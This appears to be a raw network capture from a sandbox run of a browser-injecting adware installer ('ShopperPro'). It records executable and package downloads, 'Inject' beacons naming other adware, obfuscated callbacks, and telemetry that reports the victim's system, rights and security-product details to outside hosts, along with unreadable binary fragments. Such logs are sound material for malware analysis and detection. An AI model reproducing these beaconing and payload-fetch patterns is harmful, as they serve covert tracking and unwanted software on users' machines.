Length: 0..Connection: Keep-Alive..X-Cache-Info: cached..



GET /ShopperProJSINJFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 250000-499999/4737507
i......A ..6...$Q$...........UX..%[email protected],..~...t.w.R...K*..S?4.\....
_p...G...$....).3...<X{..k......=.5...!......... .B#*h.[?H...X6.D.q
...U|E9.....P..J..D.Gd.d.NY...'.._..rX.l.....k.......u...v..8...i.k.m.
.`.~$T=....h...}..../....<_t..7......E.H.D..f~.]Jd.........9....H~.
..xR.T....c.n.N.7.8\|........,=....Cy}!A..T^............W.n....cN.....
..hj.......[...>...Y.Q..G&.Lfp..EL#.X.b.W....g./"=..$...Rh....[.9t.
8%..:.....^........U..m..Q..w..y.{.h.L..h\)N..:..:...8...O.....C.N.06.
[email protected].!h. .g.'.t...0.....|.ye.....]
K..ob.1.d.....h...O#[email protected]..:."....k..J'L.m&...3...>...i|E..A
.-$|O....2.._.../.>6......^X."..$..e..Ef......_n.......XT......-...
7...O:p........5.....=.J.Y.......~..U:D04S.B..Y.>st.w...!....[./...
...j....M. m}.......^[email protected]\.../..w...f....]..H......h..p.x.....l..
..E.....a.7...Y...r.d...\...$..e.X.....W.ka...BJl..tG.8...A.....;({K8.
...*.......K.. ..... ..Zw/1.h....O...O2.v$X.L..|C.......$...o.?Z..A/4.
.0I %..4.Ei.a.}...L.I.y...kj.:..eas..Fj......`.......e.!. [email protected]&l
t;TK_..z 9....\{lj=9L.[..8..........7.n.d....T.EOB.....[.../......T..&
gt;3.JY....._O....(.Iw..}....fWT.C dg7_Q.....b.Z4x...^l.4.^..d.|../."g
H.8.\..I.:. . .m..!....z..wV....%M...#)^X.g..........I..;.W.,........Y
1..,2....Q..c.v..E=nX.X.....".................xB.......W.:.Gl.....:&i.
...>....$......T.>d..L.1.....[J....ag.J.0.w.X.f.0.(H...<..b..
p.m.........M..E.\}).3W...._q.K.d|Z.:.Nk........Q..:..d.(W....D.......
....A......$...- ...}6N..J.0.......%...%.m...,.id|.....T.....k...;
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 750000-999999/4737507
..c.._......%..v..n.E.-&4../...%..r...=F......Bi\:.lnk....n.!.H...)/.J
...2.{.=..n..=.y..*f....._E.gg.G.Y&..................g.TzG....u.=.....
^..&....&z..c...Jz..z..%g.fb..D...j.F..W......K6......W.%.6.l'..H.....
......o..b{..[....C.............fK.9.Ill.....N...w[.>...u........^S
...GP X....Cj"...........w.J....(........!a..bWzH.&.. .oL.}`..R.3....,
...............!5CRlIi.Tb.......#y.....%.?.e.lV;,........=..n.fg.3...:
.....RL.&y....c.w.d........~B..K2Y..D.I....q.%XC/N...L.81...}&...h../C
...X;a.*y(.$>.\...x.."....R<V....i...W..9...-0y.3E^h...:.66.[...
..%...0...6..Hq..X......i.3_.......\.b83.`L....lj,....sE~L.5A..@...#.'
..R.@..>)o.X.\]....fpMtJQ ........R...=B..tB{..3..a......G*.^.C...:
.=...7.1.......rY.A.mC.&lg .[..Q.wzf...I.HU30u....F.....Ah2iZV4..o...M
B3~j3.C "3-.#_^...B..8~f..b..cM.'.1.m.L&x\.C....T..........3.-..k...oY
$.&x..W... W.3..].N..gF.W.........?...1r1.f.....v[.k....x..C..@B.....#
3........g[c.d.u.r(H...U..;2...3s.........3...v.t..9...F.....4.k.n.].}
........Q0......"....g........A<.....T.................8..D........
.U.=.!.#5:..1!.9l?{.Q..T.L;.G.F ..Z..$5....-d.......s.....o.7.....0...
M..Q..RqBa..}....W...S.Lb........D....v.....ZS .......!......... 9t...
e.V2%....l./.$i. [email protected]..$.{.e.o.\..~.../...`..t5..>
;...xH...Kg.....%*VYS4o*S..u,.....s.........6].n<.$.N<......4...
.-....o.........C..\.E..e.A.FpAfZ.\q'. ....M....4.....,.g...g.l...9...
.S-N..n..d..&.....ag...:.;.UdKM..*......ue)v...`IYN[#.....S...w....S.J
.5.{}>...F..5....I.r{..bS."....g...p..Cy...5.d.......{62..d_...
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/4737507
.L]Th...n.....y..p.....w.* ...v N........QA. c./..1..R.@.=....7.....KG
6o..%..Y"m..4.o..H......g],..P..vQ....{.m...?u.x...I..`.....>.-.b&.
.X.......y.....k4.C...v|..w..f?...........3....D....c...].iB.M.KT.t..D
u.L./Y.T.Sh|..K.7;...N.9...5j.....-...........bp...z.Y.&#..!..e.f.....
.."\.u....H1...U>..M%.....f.Y.J$@. ..C.s{u...3......6J.I......&4X}.
q.$,.\........._../%..X.....!.....p....R/K.&...Q(.......m....;\.....BL
....6z...^....Z.G.M.s..;zt~.......X..J(..W....w...........,..(d...j.BQ
...S.?...Lpq....G..z2.e.M.k....x...c..._......EM,.......o..........c.B
..Y..0..,..#..b....'.T....~..:]tB"0.\~p...%o..h..m(.L..H..[[email protected]/..`j$
t'..D.g..}.. ;w.<..\<N7.y.F.0x/...u.E..v..,.%......Z.......Tb-..
U......9.E./{W......_.H.J..G......?.;B....}..Ml...*.5.. .#...I\.......
.........p.A.......A..2"z..E6. =..P}A."...,e..7,..Rr.~..........^$..p.
|P.....r...0f.. ~..XI......^.r...m{.j...c.,. .p..../|[email protected]
..V.... ...h.D...m...{....C.<....$Z.N....= (...tl.4M.2.~.....q(....
.7...K.G._.W.......eD.?...9#I.......:...yz...U..K......z..y..8........
.Q&...-...$u&h.'.....G...O.......aN........:[email protected]
....x...42T....K......~..O].;,u.......J...1P0.....J ..i...O.30...U..'k
....&{.v....'.->O.uc.W."...B....j8.t....|\%N4...c.%....-.t...b.,...
>..c...."[email protected]..~7..c..}.CWO.k..Z.4....#...
.^...m......3..3..g).....,. ........62.Z.@.|.L.(y.,S.k[@jq..7k.."J.GH.
[.i..Z[....ec...5..{.CV.R.F...b`sJ.f..3...@..:Q4V.....g.....Gc6..6.n..
.'.... Q8..q...5M.5.,.Sh.0..s........K ..a..L.........L...#..TTlWP
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive



........O.2z.....-......3V...r.M..8&...o.k..../[email protected]|.....b.Q..i4.Y.
....[%..."..K.Q/..w%9n.q,=.T......r...............z{>-%.......5.J&g
t;3..^2t.-...MD....oJ...u7..R.K^..)...Q.4..%.YA.....>.....3.3...)..
.....A.&l#[email protected]!.u.G..t...U.......F..W.z.sH.....S.bF3..=
...'@#m\OY......?9..&.V6.S.*LU.h-9]...?..R(..]....Y.[<AD...S.b....]
.._......@)>...g_.2BD.Py.....w....5u..{R..B..B2.o....g,-I......h..}
}..B.....?...).......k.:G...B....b.N.,k.......vo9..j-D.RQ.B..-..DT....
...`.91.`x-.30......%..w<...aO...5.n....0I ...$.U.iF....R5W..<..
....[kcS9.v..E.[m.N).....r9...&.O2(.l.!.o^.9.."t.'.}....s.W.. b...jY7.
...pq..M.- L.)<d...;.S....\..n&M.f....`.....V.l.w;:........t(..eS.x
.fk...%.\6.......p.D>ik....3.]..>....("...#P .....hC">.....w&
#...$a......9a...F..S.2]!:P...I...../w=8....m.;a../[....R.-.47]..*.=..
.a......F*.^&/'^k...a.....]P:<..(.....z.0.....}....E...\.*...X.....
..0..Z.....ly9R~.....tJpY..."c..M.~.V.w..w.<....9...9..|[,!'.h&..j.
@..FbK.?.:(.bC..\*i...7.k.t....M.m...*,....s..!...mU.A..Y.j.1v...".S..
"..5.m.PgA..(l.......cm.|......x.2.zY.,<.fFz`R.Da....?..6..........
..,%U.......b....H[..$...8..G...; .'....*i..].......c.].4c.~..M.U..4 .
.m}.vnR.......'.'...)f.9_.T.iz.......T...F.nr...L... B....<...a..Y.
..a...x..].;.&..<.g...i.nf.}A.a.....2.\.....T[...b..............`U.
..H...........Y8z.......K. }..m...<.........NQ..GVF...A;.f...G...m.
...7..ajz..Q.Y.C...^l3.M.rc.....1..c.`.W.wQ9...&].h...9..p>........
.<....rg...Y.....{W'.)....=....~...2...m1~pD.n.$........a...T..
<<< skipped >>>


GET /3428_3b67a5ef5d450c1556c543c6323981d9/1.pak HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: dlrkbt247pbk6.cloudfront.net
Accept: */*
Accept-Encoding: gzip, deflate
Connection:keep-alive


HTTP/1.1 200 OK
Content-Type: binary/octet-stream
Content-Length: 2211109
Connection: keep-alive
Date: Sat, 18 Apr 2015 08:26:41 GMT
Last-Modified: Sat, 18 Apr 2015 08:16:11 GMT
ETag: "bd672bcfb912270b29f4c1dd097905a3"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54542
X-Cache: Hit from cloudfront
Via: 1.1 618f5851b14debafe852931f0e2f2acd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Hr74eytoVLVCQilWPmb4jTEsiEwn0wZ1Tx8DeC27Pcd6wc7TNpx3ag==
...... . .......!.............474.json.....5.9s..[.:?..y....xL..@a....
..w..sN.....^.9....'.t.."....u...........N5..g(.......{.)..Q.!..Dk..ze
f....s.{.kM.S.*:.......6|.&...M..ZWYr.....uA....R/..,...0..........g..
]V3..n.`...}..g_j.......i.n..;.........Ts..C......o.l.'7u..........l..
.z.ZJ......S"Z....f....W..m..^....$m.=...O.Z...k.=..i...`_...;......kV
........V..8?V.;...*......EF...^'...?*..n.r&....o..wv..}\S.,......N...
.4.w...6.......:....s..)......C.eg..4..........~........P.F.E.i....0..
....c.....9..feKn.q.x......y.........................PK...........F..3
.e....K......uninstallDlg2.xml.\m.....^.......z.f.N...mo..As..$(..@K..
.L.../...w(Q.d.k9.6^T..."....gH....o..1.'"...,gh[...G.-gV&...X(..E8...
.'.Z.........E.....(........q"sQ.@}=..Fd..X.8.!...Y..........|.o..1..Y
......%; t..hfI...Q.c.....S..8B.~.x..S%....p.G......u..m.R~%..E.......
.{.gp..9..?.'..k.\..I...]........K..B.$...q...5^.]..1...O......s...-.b
..L..M.s......Z.^qy.....ul.!7....N..2....!;.)..'K...t..4..5.O...q.....
....u...9...:iG4.P....Ek.....(..D.C......ng..{.oP.....{....t..nd8.`. .
c.x..!.;.$7........ve.........p4.s.P....C..l=7e.7.......\0"t=,"..(`f..
[email protected]*.6E%#....)..~N..6........1T.(......3.0...f.......7..xb
...v.&..C..q.`)n..e.Y.L1....j.'"$.q.=~..D.4...5Rq.....B.<(...m.Z...
.z>"...7 .fp..J.&..>*....e.mOl.)#.g@.*....?.?.=..8..f.....B..Q.G
.4.......!.!...`.2.V.....%....hQ.-.Q..^{[email protected]............\..:..
Kv.s....../OW.`N6(..&.....(5."....m..C....c.C..?{C^......pbT..*-...j..
F...R.......U..'o.OJUu.]^4..^........x~ I..0[nV....PA.O...8.'.r.BY
<<< skipped >>>


GET /app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=GoobzoInfo HTTP/1.1
Host: rep.shopper-pro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:50 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/8.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:50 GMT..Content-Length: 0..



GET /app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=DealPly HTTP/1.1
Host: rep.shopper-pro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:50 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/8.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:50 GMT..Content-Length: 0..



GET /fp?alpha=J3csDhl8ezg9DQ4BAyQWJjN/AxknKzp/WAB2bRFFIGMhDl8lBl58ASI2QnlIZmQoXRQ6BTMPLyYADCYLP1Mje21PdmZmGnEjOR0PAiNXAwZkdi9CRzBve3ocWRksTAwiI20aHXcNJXF1IDAwFUt9ZCFaZiYJQghGOnF9UBlwYQ4DCTQyP1BKay48G0gPZ1wxCzdsOlYXIXpwYhlZCSpJGCMvYB8bYgx5aHMnJTcBWHpiOQ00N1UWGglmfB0KUHd8CUZ/LSA9SkEpd2VcFQ40Shx/EX14HRE8cHlzGFEfLk4TcGUsFXsrVXgnMGYlRF0eLj99DidJTUEFWD92f2gZZ2cJWmI7cmhjGwIuPBZEUn4ofR9gayJCRzh1fm8eJB0sSwwgJQZpaAZWGRk2WiUI HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..
Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-As
pNet-Version: 4.0.30319..SVR: SP004C2..X-Powered-By: ASP.NET..p3p: CP=
"CAO PSA OUR"..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 0.
.HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache.
.Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-A
spNet-Version: 4.0.30319..SVR: SP004C2..X-Powered-By: ASP.NET..p3p: CP
="CAO PSA OUR"..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 0
......


GET /ii?alpha=KnR0DWR/LWxbB0J/WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5QVElyIFdveShjDS9WcBxibnZqc1k4PXU3JTEKaDQQdXVwYFs9IEohbV59YBpJahBvcFgGKhwTDSY2bCRXdy0gHlpHGwppQm8eS3RXchI9QjZrDzEsCGd7Mj1hYlgHJBY8OnprXTQ9BQkiWWppK1RjMnIWAUZ+XV1MNjFiRRMteXRLTksbKGdNcgU4ck5kFDdbPDh4YmJaJj1vJndkXQo1GjpqfHtOcT9ZJyAaIiZpFTVgPTIESXRVF3p4YS58Eio/OW1TSwAjYgEBP3kmXXJPYlwla2x+LF54MTg3ICJRE3ZTeSwnPkYwcgh0cQ8oPG0NP3QQe1oYIAYfGWZpJignI3NiXRtGGytoHBYFRxx5JwIrXzBrHBsdIkkqJWV8AiFdJw0tMDVOZiYuSiFrbHF0LE5kKnISSHtZYWMfUm8xfkEGemdRXkdSNm0cdC52MQUwQD4PYl5qU00GX20= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: install.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 84
5ELv1NHuGK3QpPsh0qiQ4g twM7gTajZo 1OiYTR8Fbxnsa7YKr 4/oSrofD wW91L/uas
SKz7XgWjTsGvA2....


POST /if?alpha=KnR0DWQ1TAl4TBt7WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5YQUkVbkQ+J1E8UXUtLV4/BS8xNg9gKixnfGBKXHtNeC0gNhtlYQl8ZQgpM2gKMWA2JA5qaF0XVnN+MnkOMHo3XFhENjRpd296KHwIL192AmN4aW53XjkqJnQuGANJeyobOnprXyg/XXkcU3ZiN0x2anJ3XAV4W14ZeXU0cBN/UnhbT00HKWBVchxxPFxuETcSZHYIKi0KbX8yeC46DUZmMWg8Y31ZIiZXKmsAODB2CitxZHFZCGlXWEl/ZSc1ESN8ehgHAkVoNgc9OHQzVmZbAVw0OjErKkwgWS94NTEIChULKWhwawJ3IU55fxx2NCgGfGAzN1URKh4bDyQgL3Rcci8rDQ0YQXA8ExBxKmICNVNiQjwyZR4jAHtpZ3UuOQIXAjEXUlQ+Tz4iW3kPeUdIGR1hMm8XJV97QE8TNlAPYgAwejFuVFAAM2dNchg4AXtSL2R2OiUzeAYJfmUidEkjCw9qV2E= HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.theswiftrecord.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache

alpha=KnR0DWRYdkIvFHRicWkKDSsnHntQIHUsCC1aNjspaHREZz4sWSgXbn1rKGdsKjUnbhFFcEh2
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sat, 18 Apr 2015 23:35:39 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}..



GET /utility.gif?report=fdata&f=1&c=000171&i=100&n=init_start_funnel_step_name&rnd=1429400147 HTTP/1.1
Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: Lji 7pQ40N RHO1Cyy8I SwAteMyiaUAsbxbiLSByYHHbFfL7FjUcm7yrZFZN2f2
x-amz-request-id: C774967F1A65AF75
Date: Sat, 18 Apr 2015 23:35:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Lji 7p
Q40N RHO1Cyy8I SwAteMyiaUAsbxbiLSByYHHbFfL7FjUcm7yrZFZN2f2..x-amz-requ
est-id: C774967F1A65AF75..Date: Sat, 18 Apr 2015 23:35:48 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 3yNau1GFaReXFXPqbxMz6eBJCJcfibnUOH7xSOG qRUfRBeq3IGSmfqg9Ju7wSSu
x-amz-request-id: 1498CD9CA70BE7E0
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3yNau1
GFaReXFXPqbxMz6eBJCJcfibnUOH7xSOG qRUfRBeq3IGSmfqg9Ju7wSSu..x-amz-requ
est-id: 1498CD9CA70BE7E0..Date: Sat, 18 Apr 2015 23:35:51 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=200&n=init_end_funnel_step_name&rnd=1429400150 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: XziYfil3zu92oWCEzerPTAdwk8zhi1WAD9DXA3yaoX1iAxjIYNO8BzGrw9eGWtYK
x-amz-request-id: 0FBE36F37FD53CA9
Date: Sat, 18 Apr 2015 23:35:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=300&n=deploy_start_funnel_step_name&rnd=1429400151 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: Dap8Uy5eqpw34flZ0gTM AE/2alJjkSGsidtHzKiL4um7438zk1rVtCIZIqck7eg
x-amz-request-id: AC6DE3675B2CBD62
Date: Sat, 18 Apr 2015 23:35:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Dap8Uy
5eqpw34flZ0gTM AE/2alJjkSGsidtHzKiL4um7438zk1rVtCIZIqck7eg..x-amz-requ
est-id: AC6DE3675B2CBD62..Date: Sat, 18 Apr 2015 23:35:52 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 3BuUV3/F/n8ZR2RG7gsvr6khD8vQEWaheTljkspe0Dz7oYAnVl1jQhmtONbNYM84
x-amz-request-id: 97E71ABCF07A2D25
Date: Sat, 18 Apr 2015 23:35:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3BuUV3
/F/n8ZR2RG7gsvr6khD8vQEWaheTljkspe0Dz7oYAnVl1jQhmtONbNYM84..x-amz-requ
est-id: 97E71ABCF07A2D25..Date: Sat, 18 Apr 2015 23:35:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: X/DA729vf8N4PlZ4MEHY8y/L3RKzdBDJ I3Xb9CoxCBydLQSkhhEJxsFk49aCUZz
x-amz-request-id: 1AFC5147EF01BB88
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: zXgDHvfVeeyi4AK2Z4d1cMTtZYfhFyIz/7UMBK pSNWv31lXiLr4xhB1gImOb1DK
x-amz-request-id: 75D31F57DCD2BD72
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
